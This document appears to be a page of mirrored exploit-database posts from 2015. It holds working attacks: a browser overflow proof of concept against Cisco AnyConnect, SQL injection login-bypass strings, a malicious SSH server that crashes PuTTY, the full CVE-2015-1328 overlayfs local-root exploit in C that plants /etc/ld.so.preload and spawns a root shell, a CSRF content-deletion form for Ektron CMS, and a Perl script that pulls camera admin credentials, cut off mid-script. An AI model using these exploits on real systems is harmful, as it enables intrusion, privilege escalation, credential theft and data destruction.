HireHackking

<!-- Cisco AnyConnect Secure Mobility Client Remote Command Execution Vendor: Cisco Systems, Inc. Product web page: http://www.cisco.com Affected version: 2.x 3.0 3.0.0A90 3.1.0472 3.1.05187 3.1.06073 3.1.06078 3.1.06079 3.1.07021 3.1.08009 4.0.00013 4.0.00048 4.0.00051 4.0.02052 4.0.00057 4.0.00061 4.1.00028 Fixed in: 3.1.09005 4.0.04006 4.1.02004 4.1.02011 Summary: Cisco AnyConnect Secure Mobility Solution empowers your employees to work from anywhere, on corporate laptops as well as personal mobile devices, regardless of physical location. It provides the security necessary to help keep your organization’s data safe and protected. Desc: The AnyConnect Secure Mobility Client VPN API suffers from a stack buffer overflow vulnerability when parsing large amount of bytes to the 'strHostNameOrAddress' parameter in 'ConnectVpn' function which resides in the vpnapi.dll library, resulting in memory corruption and overflow of the stack. An attacker can gain access to the system of the affected node and execute arbitrary code. ========================================================================== (f48.10cc): Unknown exception - code 000006ba (first chance) (f48.10cc): C++ EH exception - code e06d7363 (first chance) (f48.10cc): C++ EH exception - code e06d7363 (first chance) (f48.10cc): Stack overflow - code c00000fd (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll - eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 vpnapi!ConnectIfcData::setConfigCookie+0x9195: 748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 0:000> g (f48.10cc): Stack overflow - code c00000fd (!!! second chance !!!) eax=00232000 ebx=02df9128 ecx=00000000 edx=088f0024 esi=01779c42 edi=088f0022 eip=748b6227 esp=0032ea14 ebp=0032eab0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 vpnapi!ConnectIfcData::setConfigCookie+0x9195: 748b6227 8500 test dword ptr [eax],eax ds:002b:00232000=00000000 0:000> d edi 088f0022 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0032 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0042 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0052 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0062 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0072 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0082 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0092 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0:000> d edx 088f0024 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0034 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0044 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0054 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0064 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0074 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0084 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 088f0094 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. <12308000 B ---- >512150-512154 B First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\RPCRT4.dll - eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 RPCRT4!UuidCreate+0x835: 75440fc4 56 push esi 0:000> g (1a50.1e40): Stack overflow - code c00000fd (!!! second chance !!!) eax=004d2384 ebx=76e9b7e4 ecx=00193214 edx=00000000 esi=00193214 edi=00193738 eip=75440fc4 esp=00193000 ebp=00193008 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 RPCRT4!UuidCreate+0x835: 75440fc4 56 push esi 0:000> d eax 004d2384 46 75 6e 63 74 69 6f 6e-3a 20 43 6c 69 65 6e 74 Function: Client 004d2394 49 66 63 42 61 73 65 3a-3a 67 65 74 43 6f 6e 6e IfcBase::getConn 004d23a4 65 63 74 4d 67 72 0a 46-69 6c 65 3a 20 2e 5c 43 ectMgr.File: .\C 004d23b4 6c 69 65 6e 74 49 66 63-42 61 73 65 2e 63 70 70 lientIfcBase.cpp 004d23c4 0a 4c 69 6e 65 3a 20 32-35 38 30 0a 43 61 6c 6c .Line: 2580.Call 004d23d4 20 74 6f 20 67 65 74 43-6f 6e 6e 65 63 74 4d 67 to getConnectMg 004d23e4 72 20 77 68 65 6e 20 6e-6f 74 20 63 6f 6e 6e 65 r when not conne 004d23f4 63 74 65 64 20 74 6f 20-41 67 65 6e 74 2e 00 00 cted to Agent... 0:000> d 004d2404 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 004d2414 00 00 00 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA 004d2424 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2434 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2444 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2454 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2464 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 004d2474 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0:000> d esp+1500 00194500 00 00 00 00 f8 e6 28 00-ec 3c 85 74 04 00 00 00 ......(..<.t.... 00194510 ff ff ff ff 00 00 00 00-00 00 00 00 00 00 00 00 ................ 00194520 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194530 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194540 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194550 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194560 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00194570 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA ========================================================================== Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [25.03.2015] Vulnerability discovered. [28.03.2015] Vendor contacted. [29.03.2015] Vendor responds asking more details. [13.04.2015] Sent details to the vendor. [15.04.2015] Asked vendor for status update. [15.04.2015] Vendor opens case #PSIRT-0089839229, informing that as soon as incident manager takes ownership of the case they will be in contact. [22.04.2015] Asked vendor for status update. [28.04.2015] No reply from the vendor. [04.05.2015] Asked vendor for status update. [05.05.2015] Vendor assigns case PSIRT-0089839229, defect CSCuu18805 under investigation. [12.05.2015] Asked vendor for confirmation. [13.05.2015] Vendor resolved the issue, not sure for the release date. [14.05.2015] Asked vendor for approximate scheduled release date. [15.05.2015] Vendor informs that the defect is public (CSCuu18805). [19.05.2015] Asked vendor for release information. [19.05.2015] Vendor informs releases expected to be on June 7th for 3.1 MR9 and May 31st for 4.1 MR2. [11.06.2015] Vendor releases version 4.1.02011 and 3.1.09005 to address this issue. [13.06.2015] Public security advisory released. Advisory ID: ZSL-2015-5246 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5246.php Vendor: https://tools.cisco.com/bugsearch/bug/CSCuu18805 25.03.2015 --> <!DOCTYPE html> <html> <head> <title>Cisco AnyConnect Secure Mobility Client VPN API Stack Overflow</title> </head> <body> <button onclick="O_o()">Launch</button> <object id="cisco" classid="clsid:{C15C0F4F-DDFB-4591-AD53-C9A71C9C15C0}"></object> <script language="JavaScript"> function O_o() { //targetFile = "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnapi.dll" //prototype = "Sub ConnectVpn ( ByVal strHostNameOrAddress As String )" //memberName = "ConnectVpn" //progid = "VpnApiLib.VpnApi" var netv = Array(255712).join("ZS"); var push = //~~~~~~~~~~~~~~~~~~~~~~~~// /*(()()())*/ "ZSZSZSZSZSZSZ"+ "SZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZ"+ "SZSZ" +"SZSZSZ"+ "SZSZSZ"+ "SZSZ" +"SZSZSZ"+ "SZSZS"+ "ZSZS" +"ZSZSZ"+ "SZSZS"+ "ZSZS" +"ZSZSZ"+ "SZSZS"+"ZSZSZ"+"SZSZS"+ "SZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZSZ"+ "SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZ"+ "SZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZSZS"+ "ZSZSZSZ" +"SZSZSZSZSZSZ"+ "SZSZ"+ "SZSZSZS" +"ZSZSZSZSZSZSZS"+ "ZSZS"+ "ZSZSZSZ" +"SZSZSZSZSZSZSZ"+ "SZSZ"+ "SZSZSZSZ"+ "SZSZSZSZSZSZSZSZS"+ "ZSZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ" +"SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZS"+ "ZSZ"+ "SZS"+ "ZSZ"+ "SZS" +"ZSZ"+ "SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+ "SZ" +"SZ" +"SZ" +"SZ" +"SZ"+ "SZ"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "S"+ "S"+ "Z"+ "S"+ "Z"+ "S"+ "S"; var godeep = netv.concat(push); cisco.ConnectVpn godeep } </script> </body> </html>

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> | Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability | | Date: 06.13.2015 | | Exploit Daddy: Walid Naceri | | Vendor Homepage: http://milw0rm.sourceforge.net/ | | Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download | | Version: v1.0 | | Tested On: Kali Linux, Mac, Windows | |><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><| | Website exploiter: WwW.security-Dz.Com | | CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA | | Sorry: Sorry pancaker, you missed that one :( | <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> ### vuln codez admin/login.php ### <? $usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing? $pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer? if($usr && $pwd){ $login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';"); $row = mysql_num_rows($login); ----Bla Bla Bla-------- ### manual ### Go to the login admin panel :) Exploit 1: USER: ADMIN' OR ''=' PASS: ADMIN' OR ''=' Exploit 2: USER: ADMIN' OR 1=1# PASS: Anything Bro :) ### How to fix, learn bro some php again :) ### $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr']))); $usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd'])));

''' # Exploit title: putty v0.64 denial of service vulnerability # Date: 5-6-2015 # Vendor homepage: http://www.chiark.greenend.org.uk # Software Link: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.64-installer.exe # Version: 0.64 # Author: 3unnym00n # Details: # -------- # when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the putty crash # Tested On: win7, xp # operating steps: run the py, then execute : "D:\programfile\PuTTYlatest\putty.exe" -ssh root@127.0.0.1 ''' import socket import struct soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() ## do banner exchange ## send server banner client.send('SSH-2.0-paramiko_1.16.0\r\n') ## recv client banner client_banner = '' while True: data = client.recv(1) if data == '\x0a': break client_banner += data print 'the client banner is: %s'%client_banner.__repr__() ## do key exchange ## recv client algorithms str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send server algorithms client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex')) ## do dh key exchange ## recv dh group exchange request str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange group client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex')) ## recv dh group exchange init str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange reply dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl dh_gex_reply_msg += '\x09' ## padding len dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 client.sendall(dh_gex_reply_msg)

/* # Exploit Title: ofs.c - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1328 / ofs.c overlayfs incorrect permission handling + FS_USERNS_MOUNT user@ubuntu-server-1504:~$ uname -a Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu-server-1504:~$ gcc ofs.c -o ofs user@ubuntu-server-1504:~$ id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev) user@ubuntu-server-1504:~$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user) greets to beist & kaliman 2015-05-24 %rebel% *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <sys/types.h> #include <signal.h> #include <fcntl.h> #include <string.h> #include <linux/sched.h> #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" static char child_stack[1024*1024]; static int child_exec(void *stuff) { char *file; system("rm -rf /tmp/ns_sploit"); mkdir("/tmp/ns_sploit", 0777); mkdir("/tmp/ns_sploit/work", 0777); mkdir("/tmp/ns_sploit/upper",0777); mkdir("/tmp/ns_sploit/o",0777); fprintf(stderr,"mount #1\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); exit(-1); } file = ".access"; chmod("/tmp/ns_sploit/work/work",0777); } else file = "ns_last_pid"; chdir("/tmp/ns_sploit/o"); rename(file,"ld.so.preload"); chdir("/"); umount("/tmp/ns_sploit/o"); fprintf(stderr,"mount #2\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { exit(-1); } chmod("/tmp/ns_sploit/work/work",0777); } chmod("/tmp/ns_sploit/o/ld.so.preload",0777); umount("/tmp/ns_sploit/o"); } int main(int argc, char **argv) { int status, fd, lib; pid_t wrapper, init; int clone_flags = CLONE_NEWNS | SIGCHLD; fprintf(stderr,"spawning threads\n"); if((wrapper = fork()) == 0) { if(unshare(CLONE_NEWUSER) != 0) fprintf(stderr, "failed to create new user namespace\n"); if((init = fork()) == 0) { pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); if(pid < 0) { fprintf(stderr, "failed to create new mount namespace\n"); exit(-1); } waitpid(pid, &status, 0); } waitpid(init, &status, 0); return 0; } usleep(300000); wait(NULL); fprintf(stderr,"child threads done\n"); fd = open("/etc/ld.so.preload",O_WRONLY); if(fd == -1) { fprintf(stderr,"exploit failed\n"); exit(-1); } fprintf(stderr,"/etc/ld.so.preload created\n"); fprintf(stderr,"creating shared library\n"); lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); write(lib,LIB,strlen(LIB)); close(lib); lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); if(lib != 0) { fprintf(stderr,"couldn't create dynamic library\n"); exit(-1); } write(fd,"/tmp/ofs-lib.so\n",16); close(fd); system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); execl("/bin/su","su",NULL); }

The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory. This can be exploited by an unprivileged process in kernels with CONFIG_USER_NS=y and where overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs inside unprivileged mount namespaces. This is the default configuration of Ubuntu 12.04, 14.04, 14.10, and 15.04 [1]. If you don't want to update your kernel and you don't use overlayfs, a viable workaround is to just remove or blacklist overlayfs.ko / overlay.ko. Details ================================ >From Documentation/filesystems/overlayfs.txt [2]: "Objects that are not directories (files, symlinks, device-special files etc.) are presented either from the upper or lower filesystem as appropriate. When a file in the lower filesystem is accessed in a way the requires write-access, such as opening for write access, changing some metadata etc., the file is first copied from the lower filesystem to the upper filesystem (copy_up)." The ovl_copy_up_* functions do not correctly check that the user has permission to write files to the upperdir directory. The only permissions that are checked is if the owner of the file that is being modified has permission to write to the upperdir. Furthermore, when a file is copied from the lowerdir the file metadata is carbon copied, instead of attributes such as owner being changed to the user that triggered the copy_up_* procedures. Example of creating a 1:1 copy of a root-owned file: (Note that the workdir= option is not needed on older kernels) user@...ntu-server-1504:~$ ./create-namespace root@...ntu-server-1504:~# mount -t overlay -o lowerdir=/etc,upperdir=upper,workdir=work overlayfs o root@...ntu-server-1504:~# chmod 777 work/work/ root@...ntu-server-1504:~# cd o root@...ntu-server-1504:~/o# mv shadow copy_of_shadow (exit the namespace) user@...ntu-server-1504:~$ ls -al upper/copy_of_shadow -rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow user@...ntu-server-1504:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode Device: 801h/2049d Inode: 939791 Links: 1 Device: 801h/2049d Inode: 277668 Links: 1 Now we can place this file in /etc by switching "upper" to be the lowerdir option, the permission checks pass since the file is owned by root and root can write to /etc. user@...ntu-server-1504:~$ ./create-namespace root@...ntu-server-1504:~# mount -t overlay -o lowerdir=upper,upperdir=/etc,workdir=work overlayfs o root@...ntu-server-1504:~# chmod 777 work/work/ root@...ntu-server-1504:~# cd o root@...ntu-server-1504:~/o# chmod 777 copy_of_shadow root@...ntu-server-1504:~/o# exit user@...ntu-server-1504:~$ ls -al /etc/copy_of_shadow -rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow The attached exploit gives a root shell by creating a world-writable /etc/ld.so.preload file. The exploit has been tested on the most recent kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04. It is also possible to list directory contents for any directory on the system regardless of permissions: nobody@...ntu-server-1504:~$ ls -al /root ls: cannot open directory /root: Permission denied nobody@...ntu-server-1504:~$ mkdir o upper work nobody@...ntu-server-1504:~$ mount -t overlayfs -o lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work overlayfs /home/user/o nobody@...ntu-server-1504:~$ ls -al o 2>/dev/null total 8 drwxrwxr-x 1 root nogroup 4096 May 24 16:33 . drwxr-xr-x 8 root nogroup 4096 May 24 16:33 .. -????????? ? ? ? ? ? .bash_history -????????? ? ? ? ? ? .bashrc d????????? ? ? ? ? ? .cache -????????? ? ? ? ? ? .lesshst d????????? ? ? ? ? ? linux-3.19.0 Credit ================================ Philip Pettersson, Samsung SDS Security Center References ================================ [1] https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549 [2] https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt [3] http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html ## EDB Note: Exploit Mirror - https://www.exploit-db.com/exploits/37292

# Vulnerability type: Cross-site Request Forgery # Vendor: http://www.ektron.com/ # Product: Ektron Content Management System # Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114) # Patched version: 9.10 SP1 (Build 9.1.0.184.1.120) # CVE ID: CVE-2015-3624 # Credit: Jerold Hoong # PROOF OF CONCEPT (CSRF) Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10 SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication of content administrators for requests that could lead to the deletion of content and assets. <html> <body> <form action="http://127.0.0.1/Test/WorkArea/DmsMenu/menuActions/MenuActions.aspx"> <input type="hidden" name="action" value="delete" /> <input type="hidden" name="contentId" value="4210" /> <input type="hidden" name="LangType" value="1033" /> <input type="hidden" name="folderId" value="561" /> <input type="hidden" name="redirectBack" value="true" /> <input type="hidden" name="menuType" value="Workarea" /> <input type="submit" value="Submit request" /> </form> </body> </html> # TIMELINE – 07/04/2015: Vulnerability found – 07/04/2015: Vendor informed – 08/04/2015: Vendor responded and acknowledged - 01/05/2015: MITRE issued CVE number CVE-2015-3624 – 28/05/2015: Vendor fixed the issue – 31/05/2015: Public disclosure

*# Exploit Title: Apexis IP CAM - Full Info Disclosure ** **# Google Dork: inurl:"get_status.cgi"cgi-bin/** **# Date: 01/06/2015** **# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE Remoteexecution.net** **# Vendor Homepage: http://www.apexis.com.cn/** **# Tested on: Linux** * *Models Afected :** ** **APM-H602-MPC** **APM-H803-MPC** **APM-H901-MPC** **APM-H501-MPC** **APM-H403-MPC** **APM-H804* _* *__*Usage: please enter the url ipcam Example : *_ http://server/cgi-bin/get_status.cgi o http://server/cgi-bin/get_tutk_account.cgi _*You get something like this*__*:*_ [Sunplace@solutions ]$ perl xploit.pl [ Apexis IP CAM - Full Info Disclosure ] [ Discovery by: Sunplace Solutions ] [ Exploit: Sunplace Solutions - Daniel Godoy ] [ Greetz: www.remoteexecution.net - ] URL: http://server/cgi-bin/get_tutk_account.cgi [x]Trying to pwn =>/get_tutk_account.cgi Result: tutk_result=1; tutk_guid='FBX9937PJG273MPMMRZJ'; tutk_user='admin'; tutk_pwd='lolo2502'; [x]Trying to pwn => /get_tutk_account Result: tutk_result=1; tutk_guid='FBX9937PJG273MPMMRZJ'; tutk_user='admin'; tutk_pwd='lolo2502'; [x]Trying to pwn => /get_extra_server.cgi Result: extraserv_result=1; server_enable=0; server_ipaddr='192.168.1.220'; server_port=6666; server_time=10; _*Index of /cgi-bin/ example:*_ backup_params.cgi check_user.cgi clear_log.cgi control_cruise.cgi decoder_control.cgi delete_sdcard_file.cgi download_sdcard_file.cgi format_sdc.cgi get_alarm_schedule.cgi get_camera_vars.cgi get_cruise.cgi get_extra_server.cgi get_list_cruise.cgi get_log_info.cgi get_log_page.cgi get_maintain.cgi get_motion_schedule.cgi get_params.cgi get_preset_status.cgi get_real_status.cgi get_sdc_status.cgi get_status.cgi get_sycc_account.cgi get_tutk_account.cgi get_wifi_scan_result.cgi mobile_snapshot.cgi reboot.cgi And more...... _*[Exploit Code]*__* *_ #!/usr/bin/perl print "[ Apexis IP CAM - Full Info Disclosure ]\n"; print "[ Discovery by: Sunplace Solutions ]\n"; print "[ Exploit: Sunplace Solutions ]\n"; print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n"; print "URL: "; $url=<STDIN>; use LWP::UserAgent; my $ua = LWP::UserAgent->new; $ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)'); chop($url); if ($url eq "") { print 'URL dont empty!.'."\n"; } else { $www = new LWP::UserAgent; @path=split(/cgi-bin/,$url); $content = $www->get($url) or error(); print "\n[x]Trying to pwn =>".$path[1]."\n"; print "Result: \n"; $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ //g; $pwn=~ s/ret_//g; print $pwn; print "\n[x]Trying to pwn => /get_tutk_account\n"; print "Result: \n"; $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or error(); $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ret_//g; $pwn=~ s/ //g; print $pwn; print "\n[x]Trying to pwn => 